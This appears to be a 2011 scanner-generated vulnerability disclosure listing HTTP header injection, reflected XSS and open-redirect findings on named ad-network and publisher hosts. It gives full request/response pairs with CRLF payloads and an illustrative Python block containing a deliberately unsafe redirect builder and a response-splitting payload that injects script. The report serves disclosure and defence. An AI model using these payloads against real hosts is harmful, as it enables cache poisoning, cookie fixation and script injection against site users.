XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, Keyword, Chelsea Handler, 05092011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 11:11:45 CDT 2011.



1. HTTP header injection

1.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

1.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.3. http://ad.doubleclick.net/getcamphist [src parameter]

1.4. http://ad.doubleclick.net/pfadx/gannett_louisville_cim/courier-journal [name of an arbitrarily supplied request parameter]

1.5. http://ad.doubleclick.net/pfadx/gannett_louisville_cim/courier-journal [secure parameter]

1.6. http://d.xp1.ru4.com/activity [redirect parameter]

1.7. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.8. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2. Cross-site scripting (reflected)

2.1. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [REST URL parameter 2]

2.2. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [REST URL parameter 3]

2.3. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [name of an arbitrarily supplied request parameter]

2.4. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [sz parameter]

2.5. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [REST URL parameter 2]

2.6. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [REST URL parameter 3]

2.7. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [name of an arbitrarily supplied request parameter]

2.8. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [sz parameter]

2.9. http://a.collective-media.net/adj/q1.q.gc.6008/life [REST URL parameter 2]

2.10. http://a.collective-media.net/adj/q1.q.gc.6008/life [REST URL parameter 3]

2.11. http://a.collective-media.net/adj/q1.q.gc.6008/life [name of an arbitrarily supplied request parameter]

2.12. http://a.collective-media.net/adj/q1.q.gc.6008/life [sz parameter]

2.13. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 1]

2.14. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 2]

2.15. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 3]

2.16. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [sz parameter]

2.17. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 1]

2.18. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 2]

2.19. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 3]

2.20. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [sz parameter]

2.21. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 1]

2.22. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 2]

2.23. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 3]

2.24. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [sz parameter]

2.25. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

2.26. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

2.27. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

2.28. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

2.29. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

2.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

2.31. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

2.32. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

2.33. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

2.34. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

2.35. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

2.36. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

2.37. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

2.38. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

2.39. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

2.40. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

2.41. http://ad.doubleclick.net/adj/blog.us.eonline/mm [name of an arbitrarily supplied request parameter]

2.42. http://ad.doubleclick.net/adj/trb.latimes/hp [name of an arbitrarily supplied request parameter]

2.43. http://ad.doubleclick.net/adj/trb.latimes/hp [rs parameter]

2.44. http://ads.bridgetrack.com/a/f/ [click parameter]

2.45. http://ads.bridgetrack.com/a/f/ [click parameter]

2.46. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]

2.47. http://api.bit.ly/v3/shorten [callback parameter]

2.48. http://api.bit.ly/v3/shorten [longUrl parameter]

2.49. http://api.collarity.com/collarity/cws/v3/uQry [appid parameter]

2.50. http://api.collarity.com/collarity/cws/v3/uQry [callback parameter]

2.51. http://api.tweetmeme.com/url_info.jsonc [callback parameter]

2.52. http://api.tweetmeme.com/url_info.jsonc [url parameter]

2.53. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.54. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.55. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.56. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.57. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.58. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.59. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.60. http://cdn.w55c.net/i/0RJOffplIg_1080158746.html [btid parameter]

2.61. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]

2.62. http://courier-journal.us.intellitxt.com/al.asp [jscallback parameter]

2.63. http://courier-journal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

2.64. http://courier-journal.us.intellitxt.com/v4/init [jscallback parameter]

2.65. http://courier-journal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

2.66. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 1]

2.67. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 2]

2.68. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 3]

2.69. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 4]

2.70. http://js.revsci.net/gateway/gw.js [csid parameter]

2.71. http://lingows.appspot.com/bubble/ [request_id parameter]

2.72. http://lingows.appspot.com/bubble/ [respond_path parameter]

2.73. http://odb.outbrain.com/utils/odb [callback parameter]

2.74. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

2.75. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

2.76. http://sitelife.courier-journal.com/ver1.0/daapi2.api [jpcb parameter]

2.77. http://sitelife.courier-journal.com/ver1.0/daapi2.api [jpctx parameter]

2.78. http://todayshow.us.intellitxt.com/al.asp [jscallback parameter]

2.79. http://todayshow.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

2.80. http://todayshow.us.intellitxt.com/v3/door.jsp [sest parameter]

2.81. http://www.polls.newsvine.com/_api/comments/getComments [jsoncallback parameter]

2.82. http://www.publishersweekly.com/pw/ajax.xml [REST URL parameter 2]

2.83. http://www.publishersweekly.com/pw/ajax.xml [REST URL parameter 2]

2.84. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 2]

2.85. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 2]

2.86. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 5]

2.87. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 5]

2.88. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 6]

2.89. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 6]

2.90. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [cli cookie]

2.91. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [cli cookie]

2.92. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [cli cookie]

2.93. http://optimized-by.rubiconproject.com/a/7476/12017/24449-15.js [ruid cookie]

3. Open redirection

3.1. http://ad.trafficmp.com/a/bpix [r parameter]

3.2. http://b.scorecardresearch.com/r [d.c parameter]

3.3. http://core.insightexpressai.com/adServer/adServerESI.aspx [redir parameter]

3.4. http://d.xp1.ru4.com/activity [redirect parameter]



1. HTTP header injection
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application (HTTP response splitting). Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content: the injected CR LF pair ends the real header, an injected empty line ends the header block, and whatever follows is parsed as a second, attacker-authored response. If the proxy server can be manipulated to associate that second response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future. In this report every injected value lands in a Location, Set-Cookie or DCLK_imp header, so even without a cache in the path the attacker can append header lines of their own, for example extra Set-Cookie lines that fix the victim's cookies for the affected domain.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any character with an ASCII code less than 0x20 (CR and LF in particular) should be rejected. Many current web servers and frameworks refuse to emit a header value containing CR or LF; the responses below show the affected endpoints do not, so the check must be made by the application itself and should be applied to the URL-decoded value, since every payload in this report arrives percent-encoded as %0d%0a.
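The following is an added illustration, not code from the report or from any of the listed hosts. It rebuilds the 302 response shape seen in instance 1.1 around a hypothetical redirect base (cdn.example), shows what a naive keep-alive client or cache makes of the response when the report's own %0d%0a payload is reflected, extends that to a full response-splitting payload (constructed here) that yields a second response carrying script, and applies the remediation above as a validation step. The parser's handling of a duplicated Content-Length (last value wins) is an assumption; real proxies differ, which is precisely why splitting has to be stopped at the source.

```python
import re
from urllib.parse import unquote

# Hypothetical redirect base used for illustration (the report's endpoints use
# their own CDN hosts).
REDIRECT_BASE = "http://cdn.example/"

# Floor from the remediation text: no control characters at all. CR and LF are
# the ones that start a new header line or terminate the header block.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
# Stricter allow-list for anything copied into a header: a short alphanumeric token.
_SAFE_TOKEN = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

# The payload from instance 1.1, URL-decoded the way the server decodes it.
REPORT_PAYLOAD = unquote("f8d99%0d%0aa339ba63673")

# Constructed response-splitting payload: closes the real response with a
# zero-length body, then appends a complete second response of its own.
SPLIT_PAYLOAD = (
    "x\r\nContent-Length: 0\r\n\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "<script>alert(1)</script>"
)


def is_safe_header_value(value: str) -> bool:
    """True only for a short alphanumeric token with no control characters."""
    if _CONTROL_CHARS.search(value):
        return False
    return _SAFE_TOKEN.match(value) is not None


def vulnerable_redirect(target: str) -> bytes:
    """Builds the 302 the way the reported endpoints do: the decoded parameter
    is concatenated straight into Location. Deliberately unsafe."""
    head = (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        "Content-Type: text/html\r\n"
        "Content-Length: 36\r\n"
        f"Location: {REDIRECT_BASE}{target}\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + b"<h1>Error 302 Moved Temporarily</h1>"


def hardened_redirect(target: str) -> bytes:
    """Same response, but the value is validated before it reaches a header."""
    if not is_safe_header_value(target):
        raise ValueError("rejected: header value must be a short alphanumeric token")
    return vulnerable_redirect(target)


def parse_responses(raw: bytes) -> list:
    """Parse a byte stream the way a naive keep-alive client or cache does:
    status line, header lines up to the first blank line, then exactly
    Content-Length body bytes, then start again on the next status line.
    A duplicated header keeps the last value (assumption; parsers differ).
    Returns one dict per response found."""
    responses = []
    pos = 0
    while True:
        end = raw.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        lines = raw[pos:end].decode("latin-1").split("\r\n")
        status = lines[0]
        if not status.startswith("HTTP/"):
            break
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length") or 0)
        body_start = end + 4
        body = raw[body_start:body_start + length]
        responses.append({"status": status, "headers": headers, "body": body})
        pos = body_start + length
    return responses
```

With REPORT_PAYLOAD the parser sees a single response whose header block now contains a line named a339ba63673, which is exactly what the scanner detected. With SPLIT_PAYLOAD it sees two responses, the second a 200 whose body is the injected script; a cache that keys that second response to the next URL on the same connection has been poisoned. hardened_redirect refuses both payloads and accepts the plain token f8d99.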


1.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f8d99%0d%0aa339ba63673 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f8d99%0d%0aa339ba63673;src=2183402;type=count651;cat=msnbc778;ord=1;num=7558945417404.175? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/f8d99
a339ba63673
;src=2183402;type=count651;cat=msnbc778;ord=1;num=7558945417404.175:
Date: Mon, 09 May 2011 16:02:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ce1c5%0d%0a278db742e5d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifce1c5%0d%0a278db742e5d?0.6100428786594421 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.eonline.com/uberblog/b240717_chelsea_handler_heading_big-screen_mall.html?cmpid=rss-000000-rssfeed-365-topstories&utm_source=eonline&utm_medium=rssfeeds&utm_campaign=rss_topstories
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifce1c5
278db742e5d
:
Date: Mon, 09 May 2011 16:03:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload d9b68%0d%0a0947d326282 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs91603032278362%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D9%252F4%252F2011%252011%253A4%253A53%25201%2520300%26pageName%3Ditunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26r%3Dhttp%253A%252F%252Fc.itunes.apple.com%252FWebObjects%252FMZConnections.woa%252Fwa%252FviewProfile%253Fid%253D1050896759%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26c5%3Dwin32%26c6%3D%253A%2520itunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26v6%3Dwww-itsthanku-071220v%26c9%3Dwindows%26v9%3Dwww-itsthanku-071220p%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D3%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1066%26bh%3D968%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1d9b68%0d%0a0947d326282&A2S=1;ord=2108736436 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/affiliates/download/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s91603032278362?AQB=1&vvpr=true&&ndh=1&t=9%2F4%2F2011%2011%3A4%3A53%201%20300&pageName=itunes%20-%20affiliates%20-%20download%20itunes%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&r=http%3A%2F%2Fc.itunes.apple.com%2FWebObjects%2FMZConnections.woa%2Fwa%2FviewProfile%3Fid%3D1050896759&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.itunes&c4=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&c5=win32&c6=%3A%20itunes%20-%20affiliates%20-%20download%20itunes%20(us)&v6=www-itsthanku-071220v&c9=windows&v9=www-itsthanku-071220p&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleglobal%2Cappleitunes%2Cappleusitunesipod&c48=1&c49=D%3Ds_vi&c50=itunes%3D3&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1d9b68
0947d326282
&A2S=1/respcamphist;src=1513429;rch=2;lastimp=240233805;lastimptime=1304955615;lis=567251;lip=63054563;lic=28638481;lir=28656360;lirv=2;likv=0;lipn=B5461009;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1304957118:
Date: Mon, 09 May 2011 16:05:17 GMT
Server: GFE/2.0
Content-Type: text/html


1.4. http://ad.doubleclick.net/pfadx/gannett_louisville_cim/courier-journal [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_louisville_cim/courier-journal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 9944f%0d%0a60fef41e701 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_louisville_cim/courier-journal;secure=false;position=3;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304957021024?&9944f%0d%0a60fef41e701=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Acourier-journal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;240697053;2-0;0;60813374;24/24;42010201/42027988/1;;~aopt=2/1/22/0;~okv=;secure=false;position=3;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;;9944f
60fef41e701
=1;~cs=m:
Date: Mon, 09 May 2011 16:04:03 GMT
Content-Length: 1077

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;240697053;2-0;0;60813374;24/24;42010201/42027988/1;;~aopt=2/1/22/0;~okv=;secure=false;position=3;ic22=1;ic19=1;i
...[SNIP]...

1.5. http://ad.doubleclick.net/pfadx/gannett_louisville_cim/courier-journal [secure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_louisville_cim/courier-journal

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 9df8a%0d%0a85a8c87a4d7 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_louisville_cim/courier-journal;secure=9df8a%0d%0a85a8c87a4d7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Acourier-journal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:03:59 GMT
Expires: Mon, 09 May 2011 16:03:59 GMT
DCLK_imp: v7;x;44306;0-0;0;60813374;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=9df8a
85a8c87a4d7
;~cs=y:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/x;44306;0-0;0;60813374;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

1.6. http://d.xp1.ru4.com/activity [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload de2b1%0d%0a947f41459ce was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=de2b1%0d%0a947f41459ce&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 09 May 2011 16:03:36 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://de2b1
947f41459ce
?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close


